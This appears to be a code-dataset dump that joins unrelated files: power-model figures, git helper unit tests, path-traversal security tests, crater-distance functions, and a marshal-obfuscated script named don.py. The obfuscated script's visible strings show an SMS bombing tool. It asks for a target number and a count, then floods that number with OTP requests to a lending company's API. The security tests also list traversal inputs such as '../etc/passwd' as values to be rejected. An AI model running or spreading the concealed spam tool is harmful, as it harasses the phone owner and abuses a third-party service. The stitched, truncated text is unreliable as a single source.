'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0816263,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0822004,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.264871,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0328147,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.5612,
'Memory Management Unit/Runtime Dynamic': 0.115015,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 20.2535,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.167778,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0121743,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.111723,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.291676,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.89808,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 1.7987100371612288,
'Runtime Dynamic': 1.7987100371612288,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.129484,
'Runtime Dynamic': 0.0800318,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 91.1337,
'Peak Power': 124.246,
'Runtime Dynamic': 25.736,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 91.0042,
'Total Cores/Runtime Dynamic': 25.656,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.129484,
'Total L3s/Runtime Dynamic': 0.0800318,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.017505
| 124
| 0.681883
| 8,082
| 68,566
| 5.779015
| 0.067434
| 0.123667
| 0.113048
| 0.093521
| 0.940051
| 0.932022
| 0.919368
| 0.886974
| 0.862352
| 0.843168
| 0
| 0.131246
| 0.22447
| 68,566
| 914
| 125
| 75.017505
| 0.747099
| 0
| 0
| 0.642232
| 0
| 0
| 0.657824
| 0.048128
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8fc4bec5f6473acf09666ea1528eb3c991276156
| 4,517
|
py
|
Python
|
tests/unit/raptiformica/shell/git/test_ensure_latest_source.py
|
vdloo/raptiformica
|
e2807e5e913312034161efcbd74525a4b15b37e7
|
[
"MIT"
] | 21
|
2016-09-04T11:27:31.000Z
|
2019-10-30T08:23:14.000Z
|
tests/unit/raptiformica/shell/git/test_ensure_latest_source.py
|
vdloo/raptiformica
|
e2807e5e913312034161efcbd74525a4b15b37e7
|
[
"MIT"
] | 5
|
2017-09-17T15:59:37.000Z
|
2018-02-03T14:53:32.000Z
|
tests/unit/raptiformica/shell/git/test_ensure_latest_source.py
|
vdloo/raptiformica
|
e2807e5e913312034161efcbd74525a4b15b37e7
|
[
"MIT"
] | 2
|
2017-11-21T18:14:51.000Z
|
2017-11-22T01:20:45.000Z
|
from os.path import join
from raptiformica.settings import conf
from raptiformica.shell.git import ensure_latest_source
from tests.testcase import TestCase
class TestEnsureLatestSource(TestCase):
    """Unit tests for raptiformica.shell.git.ensure_latest_source."""

    def setUp(self):
        # Patch all collaborators so no real remote commands are run.
        self.log = self.set_up_patch('raptiformica.shell.git.log')
        self.run_command = self.set_up_patch('raptiformica.shell.git.run_command')
        self.run_command.return_value = (0, 'standard out output', None)
        self.ensure_latest_source_success_factory = self.set_up_patch(
            'raptiformica.shell.git.ensure_latest_source_success_factory'
        )
        self.ensure_latest_source_failure_factory = self.set_up_patch(
            'raptiformica.shell.git.ensure_latest_source_failure_factory'
        )

    def _run_ensure_latest_source(self, **extra_kwargs):
        """Invoke the unit under test with the standard fixture arguments."""
        return ensure_latest_source(
            "https://github.com/vdloo/puppetfiles",
            "puppetfiles", host='1.2.3.4', port=22,
            **extra_kwargs
        )

    def test_ensure_latest_source_logs_ensuring_latest_source_message(self):
        self._run_ensure_latest_source()

        self.assertTrue(self.log.info.called)

    def test_ensure_latest_source_creates_ensure_latest_source_success_callback(self):
        self._run_ensure_latest_source()

        self.ensure_latest_source_success_factory.assert_called_once_with(
            '/usr/etc/puppetfiles',
            host='1.2.3.4', port=22
        )

    def test_ensure_latest_source_creates_ensure_latest_source_failure_callback(self):
        self._run_ensure_latest_source()

        self.ensure_latest_source_failure_factory.assert_called_once_with(
            "https://github.com/vdloo/puppetfiles",
            '/usr/etc/puppetfiles',
            host='1.2.3.4', port=22
        )

    def test_ensure_latest_source_runs_directory_exists_command(self):
        self._run_ensure_latest_source()

        # The function first probes whether the checkout directory exists.
        expected_command = ['test', '-d', '/usr/etc/puppetfiles']
        self.run_command.assert_called_once_with(
            expected_command,
            host='1.2.3.4', port=22,
            success_callback=self.ensure_latest_source_success_factory.return_value,
            failure_callback=self.ensure_latest_source_failure_factory.return_value
        )

    def test_ensure_latest_source_returns_directory_status_exit_code(self):
        ret = self._run_ensure_latest_source()

        self.assertEqual(ret, 0)

    def test_ensure_latest_source_creates_success_callback_with_default_provisioning_directory(self):
        self._run_ensure_latest_source()

        self.ensure_latest_source_success_factory.assert_called_once_with(
            join(conf().INSTALL_DIR, 'puppetfiles'), host='1.2.3.4', port=22
        )

    def test_ensure_latest_source_creates_failure_callback_with_default_provisioning_directory(self):
        self._run_ensure_latest_source()

        self.ensure_latest_source_failure_factory.assert_called_once_with(
            "https://github.com/vdloo/puppetfiles",
            join(conf().INSTALL_DIR, 'puppetfiles'), host='1.2.3.4', port=22
        )

    def test_ensure_latest_source_creates_success_callback_with_specified_provisioning_directory(self):
        self._run_ensure_latest_source(destination='/tmp/some/directory')

        self.ensure_latest_source_success_factory.assert_called_once_with(
            '/tmp/some/directory/puppetfiles', host='1.2.3.4', port=22
        )

    def test_ensure_latest_source_creates_failure_callback_with_specified_provisioning_directory(self):
        self._run_ensure_latest_source(destination='/tmp/some/directory')

        self.ensure_latest_source_failure_factory.assert_called_once_with(
            "https://github.com/vdloo/puppetfiles",
            '/tmp/some/directory/puppetfiles', host='1.2.3.4', port=22
        )
| 38.939655
| 103
| 0.6677
| 552
| 4,517
| 5.117754
| 0.146739
| 0.144425
| 0.210265
| 0.140177
| 0.821239
| 0.798584
| 0.732035
| 0.703009
| 0.703009
| 0.662655
| 0
| 0.027944
| 0.2236
| 4,517
| 115
| 104
| 39.278261
| 0.777588
| 0
| 0
| 0.478723
| 0
| 0
| 0.227585
| 0.053133
| 0
| 0
| 0
| 0
| 0.095745
| 1
| 0.106383
| false
| 0
| 0.042553
| 0
| 0.159574
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
64e372098b425387407ebadf2f2d47e44e709790
| 1,090
|
py
|
Python
|
tests/test_security.py
|
Club-Alpin-Annecy/Flask-Images
|
5c0d4028d3e6e04769ab7bb68258c02cd4769406
|
[
"BSD-3-Clause"
] | 75
|
2015-01-07T20:25:53.000Z
|
2021-11-01T17:49:00.000Z
|
tests/test_security.py
|
Club-Alpin-Annecy/Flask-Images
|
5c0d4028d3e6e04769ab7bb68258c02cd4769406
|
[
"BSD-3-Clause"
] | 30
|
2015-01-07T19:57:58.000Z
|
2021-08-31T09:14:33.000Z
|
tests/test_security.py
|
Club-Alpin-Annecy/Flask-Images
|
5c0d4028d3e6e04769ab7bb68258c02cd4769406
|
[
"BSD-3-Clause"
] | 46
|
2015-01-14T03:09:03.000Z
|
2022-02-01T20:18:50.000Z
|
from . import *
class TestSecurity(TestCase):
    """Security-focused tests for image URL generation."""

    def test_path_normalization(self):
        # All path-traversal / non-normalized filenames must be rejected.
        traversal_attempts = (
            '/etc//passwd',
            '/./etc/passwd',
            '/etc/./passwd',
            '/something/../etc/passwd',
            '../etc/passwd',
            'http://example.com/../photo.jpg',
        )
        for filename in traversal_attempts:
            self.assertRaises(ValueError, url_for, 'images', filename=filename)

    def test_invalid_scheme(self):
        self.assertRaises(ValueError, url_for, 'images', filename='file:///etc/passwd')

    def test_invalid_scheme_with_netloc(self):
        self.assertRaises(ValueError, url_for, 'images', filename='file://../etc/passwd')

    def test_valid_paths(self):
        # Legitimate filenames must not raise.
        for filename in (
            'http://example.com/photo.jpg',
            'relative/path.jpg',
            '/absolute/path.jpg',
        ):
            url_for('images', filename=filename)
| 43.6
| 100
| 0.683486
| 128
| 1,090
| 5.65625
| 0.257813
| 0.09116
| 0.18232
| 0.303867
| 0.790055
| 0.730663
| 0.730663
| 0.730663
| 0.725138
| 0.63674
| 0
| 0
| 0.149541
| 1,090
| 24
| 101
| 45.416667
| 0.781014
| 0
| 0
| 0
| 0
| 0
| 0.250689
| 0.022039
| 0
| 0
| 0
| 0
| 0.470588
| 1
| 0.235294
| false
| 0.411765
| 0.058824
| 0
| 0.352941
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
8f616923183bea6d7cf99837c09050a664b5e6a8
| 3,890
|
py
|
Python
|
src/utils/distance.py
|
aliFrancis/mars-crater-catalogue
|
5e6ac4e1f7967b1d37d95e436edaa31ef2f2ed55
|
[
"CC-BY-4.0"
] | null | null | null |
src/utils/distance.py
|
aliFrancis/mars-crater-catalogue
|
5e6ac4e1f7967b1d37d95e436edaa31ef2f2ed55
|
[
"CC-BY-4.0"
] | null | null | null |
src/utils/distance.py
|
aliFrancis/mars-crater-catalogue
|
5e6ac4e1f7967b1d37d95e436edaa31ef2f2ed55
|
[
"CC-BY-4.0"
] | null | null | null |
import math
def flat_2D(point1, point2):
    """2D Euclidean distance between two crater centres.

    Each point is a record whose index 0 is a source/label id and whose
    indices 2 and 3 are the x/y centre coordinates. Pairs from the same
    source (equal index-0 ids) get a huge sentinel distance so they are
    never matched to each other.
    """
    if point1[0] == point2[0]:
        return 999999999.
    dx = point1[2] - point2[2]
    dy = point1[3] - point2[3]
    return math.sqrt(dx ** 2 + dy ** 2)
def flat_3D(point1, point2):
    """3D Euclidean distance between two crater records.

    Uses indices 2, 3 and 4 of each record as coordinates; records with
    the same index-0 id are pushed apart with a large sentinel value.
    """
    if point1[0] == point2[0]:
        return 999999999.
    dx = point1[2] - point2[2]
    dy = point1[3] - point2[3]
    dz = point1[4] - point2[4]
    return math.sqrt(dx ** 2 + dy ** 2 + dz ** 2)
def scaled_2D(point1, point2):
    """
    Euclidean distance of centres, scaled by average of the two diameters, so that smaller craters appear further away
    """
    if point1[0] == point2[0]:
        return 999999999.
    mean_diameter = (point1[4] + point2[4]) / 2
    dx = point1[2] - point2[2]
    dy = point1[3] - point2[3]
    return 1 / mean_diameter * math.sqrt(dx ** 2 + dy ** 2)
def scaled_3D(point1, point2):
    """
    Euclidean distance including diameter, scaled by average of the two diameters, so that smaller craters appear further away
    """
    if point1[0] == point2[0]:
        return 999999999.
    mean_diameter = (point1[4] + point2[4]) / 2
    dx = point1[2] - point2[2]
    dy = point1[3] - point2[3]
    dz = point1[4] - point2[4]
    return 1 / mean_diameter * math.sqrt(dx ** 2 + dy ** 2 + dz ** 2)
def negative_jaccard(point1, point2):
    """Return one minus the Jaccard index (intersection area over union
    area) of two circular craters.

    Each point is a record: index 0 is a source id, indices 2-4 are
    (x, y, diameter). Records sharing the same source id get a huge
    sentinel so they can never be matched together.
    """
    if point1[0] == point2[0]:
        return 999999999.
    x1, y1, diam1 = point1[2:5]
    x2, y2, diam2 = point2[2:5]
    r1, r2 = diam1 / 2, diam2 / 2
    gap = math.sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2)
    if x1 == x2 and y1 == y2 and r1 == r2:
        return 0  # identical circles: perfect overlap
    if gap >= r1 + r2:
        return 1  # disjoint circles: no overlap at all
    if gap < abs(r1 - r2):
        # One circle lies entirely inside the other.
        inter = math.pi * min(r1, r2) ** 2
    else:
        # Partial overlap: area of the circular "lens" intersection.
        inter = (
            r1 ** 2 * math.acos((gap ** 2 + r1 ** 2 - r2 ** 2) / (2 * gap * r1))
            + r2 ** 2 * math.acos((gap ** 2 + r2 ** 2 - r1 ** 2) / (2 * gap * r2))
            - (1 / 2) * math.sqrt(
                (-gap + r1 + r2) * (gap + r1 - r2) * (gap - r1 + r2) * (gap + r1 + r2)
            )
        )
    union = math.pi * r1 ** 2 + math.pi * r2 ** 2 - inter
    return 1 - inter / union
def negative_jaccard_with_diameter_priority(point1, point2):
    """Return (1 - Jaccard overlap) of two craters, weighted by their
    relative size difference.

    The negative Jaccard value is multiplied by the ratio of the larger
    to the smaller radius, so overlapping circles of very different
    sizes score worse than equally-sized ones. Disjoint circles score
    the bare size ratio.
    """
    if point1[0] == point2[0]:
        return 999999999.
    x1, y1, diam1 = point1[2:5]
    x2, y2, diam2 = point2[2:5]
    r1, r2 = diam1 / 2, diam2 / 2
    gap = math.sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2)
    size_ratio = max(r1 / r2, r2 / r1)
    if x1 == x2 and y1 == y2 and r1 == r2:
        return 0  # identical circles: perfect overlap
    if gap >= r1 + r2:
        return size_ratio  # disjoint: penalize by size difference only
    if gap < abs(r1 - r2):
        # One circle lies entirely inside the other.
        inter = math.pi * min(r1, r2) ** 2
    else:
        # Partial overlap: area of the circular "lens" intersection.
        inter = (
            r1 ** 2 * math.acos((gap ** 2 + r1 ** 2 - r2 ** 2) / (2 * gap * r1))
            + r2 ** 2 * math.acos((gap ** 2 + r2 ** 2 - r1 ** 2) / (2 * gap * r2))
            - (1 / 2) * math.sqrt(
                (-gap + r1 + r2) * (gap + r1 - r2) * (gap - r1 + r2) * (gap + r1 + r2)
            )
        )
    union = math.pi * r1 ** 2 + math.pi * r2 ** 2 - inter
    return size_ratio * (1 - inter / union)
def negative_jaccard_plus_distance(point1, point2):
    """Return (1 - Jaccard overlap) of two craters; when the circles do
    not overlap at all, fall back to the flat_2D centre distance
    normalised by (r1 + r2) so distant circles still rank sensibly.
    """
    if point1[0] == point2[0]:
        return 999999999.
    x1, y1, diam1 = point1[2:5]
    x2, y2, diam2 = point2[2:5]
    r1, r2 = diam1 / 2, diam2 / 2
    gap = math.sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2)
    if x1 == x2 and y1 == y2 and r1 == r2:
        return 0  # identical circles: perfect overlap
    if gap >= r1 + r2:
        # Disjoint: fall back to normalised centre distance.
        return flat_2D(point1, point2) / (r1 + r2)
    if gap < abs(r1 - r2):
        # One circle lies entirely inside the other.
        inter = math.pi * min(r1, r2) ** 2
    else:
        # Partial overlap: area of the circular "lens" intersection.
        inter = (
            r1 ** 2 * math.acos((gap ** 2 + r1 ** 2 - r2 ** 2) / (2 * gap * r1))
            + r2 ** 2 * math.acos((gap ** 2 + r2 ** 2 - r1 ** 2) / (2 * gap * r2))
            - (1 / 2) * math.sqrt(
                (-gap + r1 + r2) * (gap + r1 - r2) * (gap - r1 + r2) * (gap + r1 + r2)
            )
        )
    union = math.pi * r1 ** 2 + math.pi * r2 ** 2 - inter
    return 1 - inter / union
| 33.534483
| 132
| 0.581234
| 701
| 3,890
| 3.201141
| 0.115549
| 0.121658
| 0.053476
| 0.053476
| 0.83779
| 0.83779
| 0.83779
| 0.83779
| 0.83779
| 0.83779
| 0
| 0.131492
| 0.217995
| 3,890
| 115
| 133
| 33.826087
| 0.60618
| 0.164781
| 0
| 0.78481
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088608
| false
| 0
| 0.012658
| 0
| 0.35443
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8f7317b815ca2b0393a7024800c1ee73979e937f
| 155
|
py
|
Python
|
src/spaceone/monitoring/info/__init__.py
|
jihyungSong/plugin-aws-health
|
a3e43dff6c7c5c2e911bc5141807e124ee8be2fe
|
[
"Apache-2.0"
] | 2
|
2020-06-22T01:48:21.000Z
|
2020-08-07T05:22:55.000Z
|
src/spaceone/monitoring/info/__init__.py
|
jihyungSong/plugin-aws-health
|
a3e43dff6c7c5c2e911bc5141807e124ee8be2fe
|
[
"Apache-2.0"
] | null | null | null |
src/spaceone/monitoring/info/__init__.py
|
jihyungSong/plugin-aws-health
|
a3e43dff6c7c5c2e911bc5141807e124ee8be2fe
|
[
"Apache-2.0"
] | 3
|
2020-09-09T03:34:25.000Z
|
2021-03-25T05:19:40.000Z
|
from spaceone.monitoring.info.log_info import *
from spaceone.monitoring.info.common_info import *
from spaceone.monitoring.info.data_source_info import *
| 38.75
| 55
| 0.845161
| 22
| 155
| 5.772727
| 0.409091
| 0.283465
| 0.519685
| 0.614173
| 0.566929
| 0.566929
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077419
| 155
| 3
| 56
| 51.666667
| 0.888112
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
71058c27eebdcb5c964f297ce99e6fad8a6e016d
| 5,590
|
py
|
Python
|
X/don.py
|
PikriArt31/FULL-SPAM3
|
35b36e912f07f6d3280557c5e4e6f1addb386332
|
[
"BSD-3-Clause"
] | null | null | null |
X/don.py
|
PikriArt31/FULL-SPAM3
|
35b36e912f07f6d3280557c5e4e6f1addb386332
|
[
"BSD-3-Clause"
] | null | null | null |
X/don.py
|
PikriArt31/FULL-SPAM3
|
35b36e912f07f6d3280557c5e4e6f1addb386332
|
[
"BSD-3-Clause"
] | null | null | null |
#Compiled By ANKER
#https://github.com/4NK3R
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\t\x08\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-\x00\x00\x00@\x00\x00\x00s\xb6\x01\x00\x00d\x00d\x01l\x00Z\x00d\x00d\x01l\x01Z\x01d\x00d\x01l\x02Z\x02d\x00d\x01l\x03Z\x03d\x00d\x02l\x04m\x05Z\x05\x01\x00d\x03Z\x06d\x04Z\x07d\x05Z\x08d\x06Z\td\x07Z\nd\x08Z\x0bd\td\n\x84\x00Z\x0cd\x0bd\x0c\x84\x00Z\rd\re\x07\x9b\x00d\x0ee\x07\x9b\x00d\x0fe\x07\x9b\x00d\x10e\x07\x9b\x00d\x11e\x07\x9b\x00d\x12e\x0b\x9b\x00d\x13e\x0b\x9b\x00d\x14e\x07\x9b\x00d\x15e\n\x9b\x00d\x16e\x08\x9b\x00d\x17e\x0b\x9b\x00d\x18e\x0b\x9b\x00d\x14e\x07\x9b\x00d\x19e\n\x9b\x00d\x16e\x08\x9b\x00d\x1ae\x0b\x9b\x00d\x1be\x0b\x9b\x00d\x14e\x07\x9b\x00d\x1ce\n\x9b\x00d\x16e\x08\x9b\x00d\x1de\x0b\x9b\x00d\x1ee\x0b\x9b\x00d\x1f\x9d-Z\x0ee\re\x0e\x83\x01\x01\x00e\x0fe\x08\x9b\x00d 
e\x0b\x9b\x00d!e\x07\x9b\x00d"e\x08\x9b\x00d#\x9d\x08\x83\x01Z\x10e\x11e\x0fe\x0b\x9b\x00d$e\x07\x9b\x00d%e\x08\x9b\x00d#\x9d\x06\x83\x01\x83\x01Z\x12e\x13e\x12\x83\x01D\x00]~Z\x14e\x00\xa0\x15d&e\x10\x17\x00\xa1\x01j\x16Z\x17d\'e\x17k\x06\x90\x01rze\x18e\x08\x9b\x00d(e\t\x9b\x00d)e\x08\x9b\x00d*e\x10\x9b\x00d+e\x07\x9b\x00d,\x9d\n\x83\x01\x01\x00e\x05d-\x83\x01\x01\x00n.e\x18e\x06\x9b\x00d.e\t\x9b\x00d)e\x08\x9b\x00d*e\x10\x9b\x00d+e\x06\x9b\x00d/\x9d\n\x83\x01\x01\x00e\x05d0\x83\x01\x01\x00\x90\x01q,e\x0c\x83\x00\x01\x00d\x01S\x00)1\xe9\x00\x00\x00\x00N)\x01\xda\x05sleepz\x07\x1b[1;31mz\x07\x1b[1;32mz\x07\x1b[1;33mz\x07\x1b[1;36mz\x07\x1b[1;37mz\x07\x1b[1;35mc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\\\x00\x00\x00t\x00t\x01\x9b\x00d\x01t\x02\x9b\x00d\x02\x9d\x04\x83\x01}\x00|\x00d\x03k\x02r2t\x03\xa0\x04d\x04\xa1\x01\x01\x00t\x03\xa0\x05d\x05\xa1\x01\x01\x00n&|\x00d\x06k\x02rXt\x06t\x02\x9b\x00d\x07\x9d\x02\x83\x01\x01\x00t\x07d\x08\x83\x01\x01\x00t\x08\xa0\t\xa1\x00\x01\x00d\x00S\x00)\tNz\x0eMau Spam Lagi?z\x08[y/n] : \xda\x01yz\x02..z\rpython 
sms.py\xda\x01nz\nExiting...\xe9\x03\x00\x00\x00)\n\xda\x05input\xda\x01k\xda\x01h\xda\x02os\xda\x05chdir\xda\x06system\xda\x05printr\x02\x00\x00\x00\xda\x03sys\xda\x04exit)\x01Z\x03lag\xa9\x00r\x0f\x00\x00\x00\xda\x00\xda\x04lagi\x13\x00\x00\x00s\x10\x00\x00\x00\x00\x01\x14\x01\x08\x01\n\x01\x0c\x02\x08\x01\x0e\x01\x08\x01r\x11\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s0\x00\x00\x00|\x00d\x01\x17\x00D\x00]"}\x01t\x00j\x01\xa0\x02|\x01\xa1\x01\x01\x00t\x00j\x01\xa0\x03\xa1\x00\x01\x00t\x04d\x02\x83\x01\x01\x00q\x08d\x00S\x00)\x03N\xda\x01\ng\x11\x11\x11\x11\x11\x11\x81?)\x05r\r\x00\x00\x00\xda\x06stdout\xda\x05write\xda\x05flushr\x02\x00\x00\x00)\x02\xda\x01d\xda\x01ar\x0f\x00\x00\x00r\x0f\x00\x00\x00r\x10\x00\x00\x00\xda\x02wr\x1f\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\n\x01r\x18\x00\x00\x00z\x04 z"____ _ __\nz/ / __ \\____ ____ ____ ______(_) /_____ _ \nz/ / / / / __ \\/ __ \\/ __ `/ ___/ / __/ __ `/ \nz/ / /_/ / /_/ / / / / /_/ / /__/ / /_/ /_/ / \nz//_____/\\____/_/ /_/\\__,_/\\___/_/\\__/\\__,_/ \nu|\x00\x00\x00u\'\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x97\n\'u\x07\x00\x00\x00u\'\xe2\x95\x91 \'z\x08Author z\x02: Z\x05ANKERu\x1a\x00\x00\x00u\' \xe2\x95\x91\n\'z\x08github z\x18https://github.con/4NK3Ru\x07\x00\x00\x00u\'\xe2\x95\x91\n\'z\x08Youtube z\x10ANKER PRODUCTIONu\x15\x00\x00\x00u\' 
\xe2\x95\x91\n\'u|\x00\x00\x00u\'\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\n\'z\x0eEx : 88817xxx\nZ\x02Noz\x07 Targetz\x03 > Z\x03JumZ\x03lahz9https://api.danacita.co.id/users/send_otp/?mobile_phone=0Z\x06detailz\x04[+] z\x08Spam ke z\x03+62\xfa\x01 z\tBerhasil \xe9\x05\x00\x00\x00z\x04[!] z\x06Gagal 